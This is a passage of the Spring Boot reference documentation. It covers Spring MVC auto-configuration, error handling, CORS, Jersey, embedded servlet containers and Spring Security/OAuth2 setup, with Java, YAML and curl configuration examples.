{\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.DELETE)\n\t\tpublic User deleteUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nSpring MVC is part of the core Spring Framework and detailed information is available in\nthe {spring-reference}#mvc[reference documentation]. There are also several guides\navailable at http:\/\/spring.io\/guides that cover Spring MVC.\n\n\n\n[[boot-features-spring-mvc-auto-configuration]]\n==== Spring MVC auto-configuration\nSpring Boot provides auto-configuration for Spring MVC that works well with most\napplications.\n\nThe auto-configuration adds the following features on top of Spring's defaults:\n\n* Inclusion of `ContentNegotiatingViewResolver` and `BeanNameViewResolver` beans.\n* Support for serving static resources, including support for WebJars (see below).\n* Automatic registration of `Converter`, `GenericConverter`, `Formatter` beans.\n* Support for `HttpMessageConverters` (see below).\n* Automatic registration of `MessageCodesResolver` (see below).\n* Static `index.html` support.\n* Custom `Favicon` support.\n* Automatic use of a `ConfigurableWebBindingInitializer` bean (see below).\n\nIf you want to take complete control of Spring MVC, you can add your own `@Configuration`\nannotated with `@EnableWebMvc`. If you want to keep Spring Boot MVC features, and\nyou just want to add additional {spring-reference}#mvc[MVC configuration] (interceptors,\nformatters, view controllers etc.) you can add your own `@Bean` of type\n`WebMvcConfigurerAdapter`, but *without* `@EnableWebMvc`.\n\n\n\n[[boot-features-spring-mvc-message-converters]]\n==== HttpMessageConverters\nSpring MVC uses the `HttpMessageConverter` interface to convert HTTP requests and\nresponses. Sensible defaults are included out of the box, for example Objects can be\nautomatically converted to JSON (using the Jackson library) or XML (using the Jackson\nXML extension if available, else using JAXB). Strings are encoded using `UTF-8` by\ndefault.\n\nIf you need to add or customize converters you can use Spring Boot's\n`HttpMessageConverters` class:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.web.HttpMessageConverters;\n\timport org.springframework.context.annotation.*;\n\timport org.springframework.http.converter.*;\n\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic HttpMessageConverters customConverters() {\n\t\t\tHttpMessageConverter<?> additional = ...\n\t\t\tHttpMessageConverter<?> another = ...\n\t\t\treturn new HttpMessageConverters(additional, another);\n\t\t}\n\n\t}\n----\n\nAny `HttpMessageConverter` bean that is present in the context will be added to the list of\nconverters. You can also override default converters that way.\n\n\n\n[[boot-features-spring-message-codes]]\n==== MessageCodesResolver\nSpring MVC has a strategy for generating error codes for rendering error messages\nfrom binding errors: `MessageCodesResolver`. Spring Boot will create one for you if\nyou set the `spring.mvc.message-codes-resolver.format` property `PREFIX_ERROR_CODE` or\n`POSTFIX_ERROR_CODE` (see the enumeration in `DefaultMessageCodesResolver.Format`).\n\n\n\n[[boot-features-spring-mvc-static-content]]\n==== Static Content\nBy default Spring Boot will serve static content from a directory called `\/static` (or\n`\/public` or `\/resources` or `\/META-INF\/resources`) in the classpath or from the root\nof the `ServletContext`. It uses the `ResourceHttpRequestHandler` from Spring MVC so you\ncan modify that behavior by adding your own `WebMvcConfigurerAdapter` and overriding the\n`addResourceHandlers` method.\n\nIn a stand-alone web application the default servlet from the container is also\nenabled, and acts as a fallback, serving content from the root of the `ServletContext` if\nSpring decides not to handle it. Most of the time this will not happen (unless you modify\nthe default MVC configuration) because Spring will always be able to handle requests\nthrough the `DispatcherServlet`.\n\nYou can customize the static resource locations using `spring.resources.staticLocations`\n(replacing the default values with a list of directory locations). If you do this the\ndefault welcome page detection will switch to your custom locations, so if there is an\n`index.html` in any of your locations on startup, it will be the home page of the\napplication.\n\nIn addition to the '`standard`' static resource locations above, a special case is made\nfor http:\/\/www.webjars.org\/[Webjars content]. Any resources with a path in `+\/webjars\/**+`\nwill be served from jar files if they are packaged in the Webjars format.\n\nTIP: Do not use the `src\/main\/webapp` directory if your application will be packaged as a\njar. Although this directory is a common standard, it will *only* work with war packaging\nand it will be silently ignored by most build tools if you generate a jar.\n\nSpring Boot also supports advanced resource handling features provided by Spring MVC,\nallowing use cases such as cache busting static resources or using version agnostic URLs\nfor Webjars.\n\nFor example, the following configuration will configure a cache busting solution\nfor all static resources, effectively adding a content hash in URLs, such as\n`<link href=\"\/css\/spring-2a2d595e6ed9a0b24f027f2b63b134d6.css\"\/>`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.resources.chain.strategy.content.enabled=true\n\tspring.resources.chain.strategy.content.paths=\/**\n----\n\nNOTE: Links to resources are rewritten at runtime in template, thanks to a\n`ResourceUrlEncodingFilter`, auto-configured for Thymeleaf and Velocity. You should\nmanually declare this filter when using JSPs. Other template engines aren't automatically\nsupported right now, but can be with custom template macros\/helpers and the use of the\n{spring-javadoc}\/web\/servlet\/resource\/ResourceUrlProvider.{dc-ext}[`ResourceUrlProvider`].\n\nWhen loading resources dynamically with, for example, a JavaScript module loader, renaming\nfiles is not an option. That's why other strategies are also supported and can be combined.\nA \"fixed\" strategy will add a static version string in the URL, without changing the file\nname:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.resources.chain.strategy.content.enabled=true\n\tspring.resources.chain.strategy.content.paths=\/**\n\tspring.resources.chain.strategy.fixed.enabled=true\n\tspring.resources.chain.strategy.fixed.paths=\/js\/lib\/\n\tspring.resources.chain.strategy.fixed.version=v12\n----\n\nWith this configuration, JavaScript modules located under `\"\/js\/lib\/\"` will use a fixed\nversioning strategy `\"\/v12\/js\/lib\/mymodule.js\"` while other resources will still use\nthe content one `<link href=\"\/css\/spring-2a2d595e6ed9a0b24f027f2b63b134d6.css\"\/>`.\n\nSee {sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[`ResourceProperties`]\nfor more of the supported options.\n\n[TIP]\n====\nThis feature has been thoroughly described in a dedicated\nhttps:\/\/spring.io\/blog\/2014\/07\/24\/spring-framework-4-1-handling-static-web-resources[blog post]\nand in Spring Framework's {spring-reference}\/#mvc-config-static-resources[reference documentation].\n====\n\n\n\n[[boot-features-spring-mvc-web-binding-initializer]]\n==== ConfigurableWebBindingInitializer\nSpring MVC uses a `WebBindingInitializer` to initialize a `WebDataBinder` for a particular\nrequest. If you create your own `ConfigurableWebBindingInitializer` `@Bean`, Spring Boot\nwill automatically configure Spring MVC to use it.\n\n\n\n[[boot-features-spring-mvc-template-engines]]\n==== Template engines\nAs well as REST web services, you can also use Spring MVC to serve dynamic HTML content.\nSpring MVC supports a variety of templating technologies including Velocity, FreeMarker\nand JSPs. Many other templating engines also ship their own Spring MVC integrations.\n\nSpring Boot includes auto-configuration support for the following templating engines:\n\n * http:\/\/freemarker.org\/docs\/[FreeMarker]\n * http:\/\/docs.groovy-lang.org\/docs\/next\/html\/documentation\/template-engines.html#_the_markuptemplateengine[Groovy]\n * http:\/\/www.thymeleaf.org[Thymeleaf]\n * http:\/\/velocity.apache.org[Velocity]\n * http:\/\/mustache.github.io\/[Mustache]\n\nTIP: JSPs should be avoided if possible, there are several\n<<boot-features-jsp-limitations, known limitations>> when using them with embedded\nservlet containers.\n\nWhen you're using one of these templating engines with the default configuration, your\ntemplates will be picked up automatically from `src\/main\/resources\/templates`.\n\nTIP: IntelliJ IDEA orders the classpath differently depending on how you run your\napplication. Running your application in the IDE via its main method will result in a\ndifferent ordering to when you run your application using Maven or Gradle or from its\npackaged jar. This can cause Spring Boot to fail to find the templates on the classpath.\nIf you're affected by this problem you can reorder the classpath in the IDE to place the\nmodule's classes and resources first. Alternatively, you can configure the template prefix\nto search every templates directory on the classpath: `classpath*:\/templates\/`.\n\n\n\n[[boot-features-error-handling]]\n==== Error Handling\nSpring Boot provides an `\/error` mapping by default that handles all errors in a sensible\nway, and it is registered as a '`global`' error page in the servlet container. For machine\nclients it will produce a JSON response with details of the error, the HTTP status and the\nexception message. For browser clients there is a '`whitelabel`' error view that renders\nthe same data in HTML format (to customize it just add a `View` that resolves to\n'`error`'). To replace the default behaviour completely you can implement\n`ErrorController` and register a bean definition of that type, or simply add a bean of\ntype `ErrorAttributes` to use the existing mechanism but replace the contents.\n\nTIP: The `BasicErrorController` can be used as a base class for a custom `ErrorController`.\nThis is particularly useful if you want to add a handler for a new content type (the default\nis to handle `text\/html` specifically and provide a fallback for everything else). To do that\njust extend `BasicErrorController` and add a public method with a `@RequestMapping` that\nhas a `produces` attribute, and create a bean of your new type.\n\nIf you want more specific error pages for some conditions, the embedded servlet containers\nsupport a uniform Java DSL for customizing the error handling. Assuming that you have a\nmapping for `\/400`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerCustomizer containerCustomizer(){\n\t\treturn new MyCustomizer();\n\t}\n\n\t\/\/ ...\n\n\tprivate static class MyCustomizer implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.addErrorPages(new ErrorPage(HttpStatus.BAD_REQUEST, \"\/400\"));\n\t\t}\n\n\t}\n----\n\nYou can also use regular Spring MVC features like\n{spring-reference}\/#mvc-exceptionhandlers[`@ExceptionHandler` methods] and\n{spring-reference}\/#mvc-ann-controller-advice[`@ControllerAdvice`]. The `ErrorController`\nwill then pick up any unhandled exceptions.\n\nN.B. if you register an `ErrorPage` with a path that will end up being handled by a\n`Filter` (e.g. as is common with some non-Spring web frameworks, like Jersey and Wicket),\nthen the `Filter` has to be explicitly registered as an `ERROR` dispatcher, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean myFilter() {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean();\n\t\tregistration.setFilter(new MyFilter());\n\t\t...\n\t\tregistration.setDispatcherTypes(EnumSet.allOf(DispatcherType.class));\n\t\treturn registration;\n\t}\n----\n\n(the default `FilterRegistrationBean` does not include the `ERROR` dispatcher type).\n\n\n\n[[boot-features-error-handling-websphere]]\n===== Error Handling on WebSphere Application Server\nWhen deployed to a servlet container, a Spring Boot uses its error page filter to forward\na request with an error status to the appropriate error page. The request can only be\nforwarded to the correct error page if the response has not already been committed. By\ndefault, WebSphere Application Server 8.0 and later commits the response upon successful\ncompletion of a servlet's service method. You should disable this behaviour by setting\n`com.ibm.ws.webcontainer.invokeFlushAfterService` to `false`\n\n\n\n[[boot-features-spring-hateoas]]\n==== Spring HATEOAS\nIf you're developing a RESTful API that makes use of hypermedia, Spring Boot provides\nauto-configuration for Spring HATEOAS that works well with most applications. The\nauto-configuration replaces the need to use `@EnableHypermediaSupport` and registers a\nnumber of beans to ease building hypermedia-based applications including a\n`LinkDiscoverers` (for client side support) and an `ObjectMapper` configured to correctly\nmarshal responses into the desired representation. The `ObjectMapper` will be customized based on the\n`spring.jackson.*` properties or a `Jackson2ObjectMapperBuilder` bean if one exists.\n\nYou can take control of Spring HATEOAS's configuration by using\n`@EnableHypermediaSupport`. Note that this will disable the `ObjectMapper` customization\ndescribed above.\n\n\n\n[[boot-features-cors]]\n==== CORS support\n\nhttp:\/\/en.wikipedia.org\/wiki\/Cross-origin_resource_sharing[Cross-origin resource sharing]\n(CORS) is a http:\/\/www.w3.org\/TR\/cors\/[W3C specification] implemented by\nhttp:\/\/caniuse.com\/#feat=cors[most browsers] that allows you to specify in a flexible\nway what kind of cross domain requests are authorized, instead of using some less secure\nand less powerful approaches like IFRAME or JSONP.\n\nAs of version 4.2, Spring MVC {spring-reference}\/#cors[supports CORS] out of the box.\nUsing {spring-reference}\/#_controller_method_cors_configuration[controller method CORS\nconfiguration] with\n{spring-javadoc}\/org\/springframework\/web\/bind\/annotation\/CrossOrigin.html[`@CrossOrigin`]\nannotations in your Spring Boot application does not require any specific configuration.\n{spring-reference}\/#_global_cors_configuration[Global CORS configuration] can be defined\nby registering a `WebMvcConfigurer` bean with a customized `addCorsMappings(CorsRegistry)`\nmethod:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic WebMvcConfigurer corsConfigurer() {\n\t\t\treturn new WebMvcConfigurerAdapter() {\n\t\t\t\t@Override\n\t\t\t\tpublic void addCorsMappings(CorsRegistry registry) {\n\t\t\t\t\tregistry.addMapping(\"\/api\/**\");\n\t\t\t\t}\n\t\t\t};\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-jersey]]\n=== JAX-RS and Jersey\nIf you prefer the JAX-RS programming model for REST endpoints you can use one of the\navailable implementations instead of Spring MVC. Jersey 1.x and Apache Celtix work quite\nwell out of the box if you just register their `Servlet` or `Filter` as a `@Bean` in your\napplication context. Jersey 2.x has some native Spring support so we also provide\nauto-configuration support for it in Spring Boot together with a starter.\n\nTo get started with Jersey 2.x just include the `spring-boot-starter-jersey` as a\ndependency and then you need one `@Bean` of type `ResourceConfig` in which you register\nall the endpoints:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class JerseyConfig extends ResourceConfig {\n\n\t\tpublic JerseyConfig() {\n\t\t\tregister(Endpoint.class);\n\t\t}\n\n\t}\n----\n\nAll the registered endpoints should be `@Components` with HTTP resource annotations\n(`@GET` etc.), e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\t@Path(\"\/hello\")\n\tpublic class Endpoint {\n\n\t\t@GET\n\t\tpublic String message() {\n\t\t\treturn \"Hello\";\n\t\t}\n\n\t}\n----\n\nSince the `Endpoint` is a Spring `@Component` its lifecycle is managed by Spring and you\ncan `@Autowired` dependencies and inject external configuration with `@Value`. The Jersey\nservlet will be registered and mapped to `\/*` by default. You can change the mapping\nby adding `@ApplicationPath` to your `ResourceConfig`.\n\nBy default Jersey will be set up as a Servlet in a `@Bean` of type\n`ServletRegistrationBean` named `jerseyServletRegistration`. You can disable or override\nthat bean by creating one of your own with the same name. You can also use a Filter\ninstead of a Servlet by setting `spring.jersey.type=filter` (in which case the `@Bean` to\nreplace or override is `jerseyFilterRegistration`). The servlet has an `@Order` which you\ncan set with `spring.jersey.filter.order`. Both the Servlet and the Filter registrations\ncan be given init parameters using `spring.jersey.init.*` to specify a map of properties.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-jersey[Jersey sample] so\nyou can see how to set things up. There is also a\n{github-code}\/spring-boot-samples\/spring-boot-sample-jersey1[Jersey 1.x sample]. Note that\nin the Jersey 1.x sample that the spring-boot maven plugin has been configured to unpack\nsome Jersey jars so they can be scanned by the JAX-RS implementation (because the sample\nasks for them to be scanned in its `Filter` registration). You may need to do the same if\nany of your JAX-RS resources are packaged as nested jars.\n\n\n\n[[boot-features-embedded-container]]\n=== Embedded servlet container support\nSpring Boot includes support for embedded Tomcat, Jetty, and Undertow servers. Most\ndevelopers will simply use the appropriate '`Starter POM`' to obtain a fully configured\ninstance. By default the embedded server will listen for HTTP requests on port `8080`.\n\n\n\n[[boot-features-embedded-container-servlets-filters-listeners]]\n==== Servlets, Filters, and listeners\nWhen using an embedded servlet container you can register Servlets, Filters and all the\nlisteners from the Servlet spec (e.g. `HttpSessionListener`) either by using Spring beans\nor by scanning for Servlet components.\n\n\n[[boot-features-embedded-container-servlets-filters-listeners-beans]]\n===== Registering Servlets, Filters, and listeners as Spring beans\nAny `Servlet`, `Filter` or Servlet `*Listener` instance that is a Spring bean will be\nregistered with the embedded container. This can be particularly convenient if you want to\nrefer to a value from your `application.properties` during configuration.\n\nBy default, if the context contains only a single Servlet it will be mapped to `\/`. In the\ncase of multiple Servlet beans the bean name will be used as a path prefix. Filters will\nmap to `+\/*+`.\n\nIf convention-based mapping is not flexible enough you can use the\n`ServletRegistrationBean`, `FilterRegistrationBean` and `ServletListenerRegistrationBean`\nclasses for complete control. You can also register items directly if your bean implements\nthe `ServletContextInitializer` interface.\n\n\n\n[[boot-features-embedded-container-servlets-filters-listeners-scanning]]\n===== Scanning for Servlets, Filters, and listeners\nWhen using an embedded container, automatic registration of `@WebServlet`, `@WebFilter`,\nand `@WebListener` annotated classes can be enabled using `@ServletComponentScan`.\n\nTIP: `@ServletComponentScan` will have no effect in a standalone container, where the\ncontainer's built-in discovery mechanisms will be used instead.\n\n\n\n[[boot-features-embedded-container-application-context]]\n==== The EmbeddedWebApplicationContext\nUnder the hood Spring Boot uses a new type of `ApplicationContext` for embedded servlet\ncontainer support. The `EmbeddedWebApplicationContext` is a special type of\n`WebApplicationContext` that bootstraps itself by searching for a single\n`EmbeddedServletContainerFactory` bean. Usually a `TomcatEmbeddedServletContainerFactory`,\n`JettyEmbeddedServletContainerFactory`, or `UndertowEmbeddedServletContainerFactory` will\nhave been auto-configured.\n\nNOTE: You usually won't need to be aware of these implementation classes. Most\napplications will be auto-configured and the appropriate `ApplicationContext` and\n`EmbeddedServletContainerFactory` will be created on your behalf.\n\n\n\n[[boot-features-customizing-embedded-containers]]\n==== Customizing embedded servlet containers\nCommon servlet container settings can be configured using Spring `Environment`\nproperties. Usually you would define the properties in your `application.properties`\nfile.\n\nCommon server settings include:\n\n* `server.port` -- The listen port for incoming HTTP requests.\n* `server.address` -- The interface address to bind to.\n* `server.session.timeout` -- A session timeout.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`]\nclass for a complete list.\n\n\n\n[[boot-features-programmatic-embedded-container-customization]]\n===== Programmatic customization\nIf you need to configure your embdedded servlet container programmatically you can\nregister a Spring bean that implements the `EmbeddedServletContainerCustomizer` interface.\n`EmbeddedServletContainerCustomizer` provides access to the\n`ConfigurableEmbeddedServletContainer` which includes numerous customization setter\nmethods.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.context.embedded.*;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class CustomizationBean implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.setPort(9000);\n\t\t}\n\n\t}\n----\n\n\n\n[[boot-features-customizing-configurableembeddedservletcontainerfactory-directly]]\n===== Customizing ConfigurableEmbeddedServletContainer directly\nIf the above customization techniques are too limited, you can register the\n`TomcatEmbeddedServletContainerFactory`, `JettyEmbeddedServletContainerFactory` or\n`UndertowEmbeddedServletContainerFactory` bean yourself.\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();\n\t\tfactory.setPort(9000);\n\t\tfactory.setSessionTimeout(10, TimeUnit.MINUTES);\n\t\tfactory.addErrorPages(new ErrorPage(HttpStatus.NOT_FOUND, \"\/notfound.html\"));\n\t\treturn factory;\n\t}\n----\n\nSetters are provided for many configuration options. Several protected method\n'`hooks`' are also provided should you need to do something more exotic. See the\nsource code documentation for details.\n\n\n\n[[boot-features-jsp-limitations]]\n==== JSP limitations\nWhen running a Spring Boot application that uses an embedded servlet container (and is\npackaged as an executable archive), there are some limitations in the JSP support.\n\n* With Tomcat it should work if you use war packaging, i.e. an executable war will work,\n and will also be deployable to a standard container (not limited to, but including\n Tomcat). An executable jar will not work because of a hard coded file pattern in Tomcat.\n\n* Jetty does not currently work as an embedded container with JSPs.\n\n* Undertow does not support JSPs.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-web-jsp[JSP sample] so you\ncan see how to set things up.\n\n\n\n[[boot-features-security]]\n== Security\nIf Spring Security is on the classpath then web applications will be secure by default\nwith '`basic`' authentication on all HTTP endpoints. To add method-level security to a web\napplication you can also add `@EnableGlobalMethodSecurity` with your desired settings.\nAdditional information can be found in the {spring-security-reference}#jc-method[Spring\nSecurity Reference].\n\nThe default `AuthenticationManager` has a single user ('`user`' username and random\npassword, printed at INFO level when the application starts up)\n\n[indent=0]\n----\n\tUsing default security password: 78fa095d-3f4c-48b1-ad50-e24c31d5cf35\n----\n\nNOTE: If you fine tune your logging configuration, ensure that the\n`org.springframework.boot.autoconfigure.security` category is set to log `INFO` messages,\notherwise the default password will not be printed.\n\nYou can change the password by providing a `security.user.password`. This and other useful\nproperties are externalized via\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\n(properties prefix \"security\").\n\nThe default security configuration is implemented in `SecurityAutoConfiguration` and in\nthe classes imported from there (`SpringBootWebSecurityConfiguration` for web security\nand `AuthenticationManagerConfiguration` for authentication configuration which is also\nrelevant in non-web applications). To switch off the Boot default configuration\ncompletely in a web application you can add a bean with `@EnableWebSecurity`. To customize\nit you normally use external properties and beans of type `WebSecurityConfigurerAdapter`\n(e.g. to add form-based login). There are several secure applications in the\n{github-code}\/spring-boot-samples\/[Spring Boot samples] to get you started with common\nuse cases.\n\nThe basic features you get out of the box in a web application are:\n\n* An `AuthenticationManager` bean with in-memory store and a single user (see\n `SecurityProperties.User` for the properties of the user).\n* Ignored (unsecure) paths for common static resource locations (`+\/css\/**+`, `+\/js\/**+`,\n `+\/images\/**+` and `+**\/favicon.ico+`).\n* HTTP Basic security for all other endpoints.\n* Security events published to Spring's `ApplicationEventPublisher` (successful and\n unsuccessful authentication and access denied).\n* Common low-level features (HSTS, XSS, CSRF, caching) provided by Spring Security are\n on by default.\n\nAll of the above can be switched on and off or modified using external properties\n(`+security.*+`). To override the access rules without changing any other autoconfigured\nfeatures add a `@Bean` of type `WebSecurityConfigurerAdapter` with\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)`.\n\n\n\n[[boot-features-security-oauth2]]\n=== OAuth2\nIf you have `spring-security-oauth2` on your classpath you can take advantage of some\nauto-configuration to make it easy to set up Authorization or Resource Server.\n\n\n\n[[boot-features-security-oauth2-authorization-server]]\n==== Authorization Server\nTo create an Authorization Server and grant access tokens you need to use\n`@EnableAuthorizationServer` and provide `security.oauth2.client.client-id` and\n`security.oauth2.client.client-secret]` properties. The client will be registered for you\nin an in-memory repository.\n\nHaving done that you will be able to use the client credentials to create an access token,\nfor example:\n\n[indent=0]\n----\n\t$ curl client:secret@localhost:8080\/oauth\/token -d grant_type=password -d username=user -d password=pwd\n----\n\nThe basic auth credentials for the `\/token` endpoint are the `client-id` and\n`client-secret`. The user credentials are the normal Spring Security user details (which\ndefault in Spring Boot to \"`user`\" and a random password).\n\nTo switch off the auto-configuration and configure the Authorization Server features\nyourself just add a `@Bean` of type `AuthorizationServerConfigurer`.\n\n\n\n[[boot-features-security-oauth2-resource-server]]\n==== Resource Server\nTo use the access token you need a Resource Server (which can be the same as the\nAuthorization Server). Creating a Resource Server is easy, just add\n`@EnableResourceServer` and provide some configuration to allow the server to decode\naccess tokens. If your appplication is also an Authorization Server it already knows how\nto decode tokens, so there is nothing else to do. If your app is a standalone service then you\nneed to give it some more configuration, one of the following options:\n\n* `security.oauth2.resource.user-info-uri` to use the `\/me` resource (e.g.\n`https:\/\/uaa.run.pivotal.io\/userinfo` on PWS)\n\n* `security.oauth2.resource.token-info-uri` to use the token decoding endpoint (e.g.\n`https:\/\/uaa.run.pivotal.io\/check_token` on PWS).\n\nIf you specify both the `user-info-uri` and the `token-info-uri` then you can set a flag\nto say that one is preferred over the other (`prefer-token-info=true` is the default).\n\nAlternatively (instead of `user-info-uri` or `token-info-uri`) if the tokens are JWTs you\ncan configure a `security.oauth2.resource.jwt.key-value` to decode them locally (where the\nkey is a verification key). The verification key value is either a symmetric secret or\nPEM-encoded RSA public key. If you don't have the key and it's public you can provide a\nURI where it can be downloaded (as a JSON object with a \"`value`\" field) with\n`security.oauth2.resource.jwt.key-uri`. E.g. on PWS:\n\n[indent=0]\n----\n\t$ curl https:\/\/uaa.run.pivotal.io\/token_key\n\t{\"alg\":\"SHA256withRSA\",\"value\":\"-----BEGIN PUBLIC KEY-----\\nMIIBI...\\n-----END PUBLIC KEY-----\\n\"}\n----\n\nWARNING: If you use the `security.oauth2.resource.jwt.key-uri` the authorization server\nneeds to be running when your application starts up. It will log a warning if it can't\nfind the key, and tell you what to do to fix it.\n\n\n\n[[boot-features-security-oauth2-token-type]]\n=== Token Type in User Info\nGoogle, and certain other 3rd party identity providers, are more strict about the token\ntype name that is sent in the headers to the user info endpoint. The default is \"`Bearer`\"\nwhich suits most providers and matches the spec, but if you need to change it you can set\n`security.oauth2.resource.token-type`.\n\n\n\n[[boot-features-security-custom-user-info]]\n=== Customizing the User Info RestTemplate\nIf you have a `user-info-uri`, the resource server features use an `OAuth2RestTemplate`\ninternally to fetch user details for authentication. This is provided as a qualified\n`@Bean` with id `userInfoRestTemplate`, but you shouldn't need to know that to just\nuse it. The default should be fine for most providers, but occasionally you might need to\nadd additional interceptors, or change the request authenticator (which is how the token\ngets attached to outgoing requests). To add a customization just create a bean of type\n`UserInfoRestTemplateCustomizer` - it has a single method that will be called after the\nbean is created but before it is initialized. The rest template that is being customized\nhere is _only_ used internally to carry out authentication.\n\n[TIP]\n====\nTo set an RSA key value in YAML use the \"`pipe`\" continuation marker to split it over\nmultiple lines (\"`|`\") and remember to indent the key value (it's a standard YAML\nlanguage feature). Example:\n\n[source,yaml,indent=0]\n----\n\tsecurity:\n\t\toauth2:\n\t\t\tresource:\n\t\t\t\tjwt:\n\t\t\t\t\tkeyValue: |\n\t\t\t\t\t\t-----BEGIN PUBLIC KEY-----\n\t\t\t\t\t\tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC...\n\t\t\t\t\t\t-----END PUBLIC KEY-----\n----\n====\n\n\n\n[[boot-features-security-custom-user-info-client]]\n==== Client\nTo make your webapp into an OAuth2 client you can simply add `@EnableOAuth2Client` and\nSpring Boot will create an `OAuth2RestTemplate` for you to `@Autowire`. It uses the\n`security.oauth2.client.*` as credentials (the same as you might be using in the\nAuthorization Server), but in addition it will need to know the authorization and token\nURIs in the Authorization Server. For example:\n\n.application.yml\n[source,yaml,indent=0]\n----\n\tsecurity:\n\t\toauth2:\n\t\t\tclient:\n\t\t\t\tclientId: bd1c0a783ccdd1c9b9e4\n\t\t\t\tclientSecret: 1a9030fbca47a5b2c28e92f19050bb77824b5ad1\n\t\t\t\taccessTokenUri: https:\/\/github.com\/login\/oauth\/access_token\n\t\t\t\tuserAuthorizationUri: https:\/\/github.com\/login\/oauth\/authorize\n\t\t\t\tclientAuthenticationScheme: form\n----\n\nAn application with this configuration will redirect to Github for authorization when you\nattempt to use the `OAuth2RestTemplate`. If you are already signed into Github you won't\neven notice that it has authenticated. These specific credentials will only work if your\napplication is running on port 8080 (register your own client app in Github or other\nprovider for more flexibility).\n\nTo limit the scope that the client asks for when it obtains an access token you can set\n`security.oauth2.client.scope` (comma separated or an array in YAML). By default the scope\nis empty and it is up to Authorization Server to decide what the defaults should be,\nusually depending on the settings in the client registration that it holds.\n\nNOTE: There is also a setting for `security.oauth2.client.client-authentication-scheme`\nwhich defaults to \"`header`\" (but you might need to set it to \"`form`\" if, like Github for\ninstance, your OAuth2 provider doesn't like header authentication). In fact, the\n`security.oauth2.client.*` properties are bound to an instance of\n`AuthorizationCodeResourceDetails` so all its properties can be specified.\n\nTIP: In a non-web application you can still `@Autowire` an `OAuth2RestOperations` and it\nis still wired into the `security.oauth2.client.*` configuration. In this case it is a\n\"`client credentials token grant`\" you will be asking for if you use it (and there is no\nneed to use `@EnableOAuth2Client` or `@EnableOAuth2Sso`). To switch it off, just remove\nthe `security.oauth2.client.client-id` from your configuration (or make it the empty\nstring).\n\n\n\n[[boot-features-security-oauth2-single-sign-on]]\n==== Single Sign On\nAn OAuth2 Client can be used to fetch user details from the provider (if such features are\navailable) and then convert them into an `Authentication` token for Spring Security.\nThe Resource Server above support this via the `user-info-uri` property This is the basis\nfor a Single Sign On (SSO) protocol based on OAuth2, and Spring Boot makes it easy to\nparticipate by providing an annotation `@EnableOAuth2Sso`. The Github client above can\nprotect all its resources and authenticate using the Github `\/user\/` endpoint, by adding\nthat annotation and declaring where to find the endpoint (in addition to the\n`security.oauth2.client.*` configuration already listed above):\n\n.application.yml\n[source,yaml,indent=0]]\n----\n\tsecurity:\n\t\toauth2:\n\t...\n\t\tresource:\n\t\t\tuserInfoUri: https:\/\/api.github.com\/user\n\t\t\tpreferTokenInfo: false\n----\n\nSince all paths are secure by default, there is no \"`home`\" page that you can show to\nunauthenticated users and invite them to login (by visiting the `\/login` path, or the\npath specified by `security.oauth2.sso.login-path`).\n\nTo customize the access rules or paths to protect, so you can add a \"`home`\" page for\ninstance, `@EnableOAuth2Sso` can be added to a `WebSecurityConfigurerAdapter` and the\nannotation will cause it to be decorated and enhanced with the necessary pieces to get\nthe `\/login` path working. For example, here we simply allow unauthenticated access\nto the home page at \"\/\" and keep the default for everything else:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\tpublic class WebSecurityConfiguration extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tpublic void init(WebSecurity web) {\n\t\t\tweb.ignore(\"\/\");\n\t\t}\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\thttp.antMatcher(\"\/**\").authorizeRequests().anyRequest().authenticated();\n\t\t}\n\n\t}\n----\n\n\n\n[[boot-features-security-actuator]]\n=== Actuator Security\nIf the Actuator is also in use, you will find:\n\n* The management endpoints are secure even if the application endpoints are unsecure.\n* Security events are transformed into `AuditEvents` and published to the `AuditService`.\n* The default user will have the `ADMIN` role as well as the `USER` role.\n\nThe Actuator security features can be modified using external properties\n(`+management.security.*+`). To override the application access rules\nadd a `@Bean` of type `WebSecurityConfigurerAdapter` and use\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)` if you _don't_ want to override\nthe actuator access rules, or `@Order(ManagementServerProperties.ACCESS_OVERRIDE_ORDER)`\nif you _do_ want to override the actuator access 